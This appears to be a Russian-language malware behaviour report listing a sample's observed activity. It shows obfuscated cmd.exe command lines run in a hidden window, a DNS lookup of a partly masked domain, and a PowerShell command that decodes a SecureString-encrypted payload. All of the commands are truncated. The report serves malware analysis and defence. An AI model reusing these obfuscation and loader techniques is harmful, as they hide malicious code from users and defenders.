Техническая информация
- '<SYSTEM32>\cmd.exe' PAWkpEW LGHcODUhAndjbGPhnklnPMB bvXilZnnBG & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qwcapwYSjbhiwTG%=wFGphAbptdEVNw&&set %LjiOJGkh%=p&&set %FGTcQjVZLjA%=o^...
- DNS ASK qw####sewqeeqw.com
- '<SYSTEM32>\cmd.exe' PAWkpEW LGHcODUhAndjbGPhnklnPMB bvXilZnnBG & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qwcapwYSjbhiwTG%=wFGphAbptdEVNw&&set %LjiOJGkh%=p&&set %FGTcQjVZLjA%=o^...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ( [RUnTImE.intEropSERviceS.MArsHal]::ptRtOstRiNgUnI([Runtime.inTEROpsErVICEs.mArsHal]::SECUreStrINGToGLObAlaLlocunIcode($('76492d1116743f0423413b16050a5345MgB8AEIAYwBIAHQARgA0AEwAegBFADAAMwA0...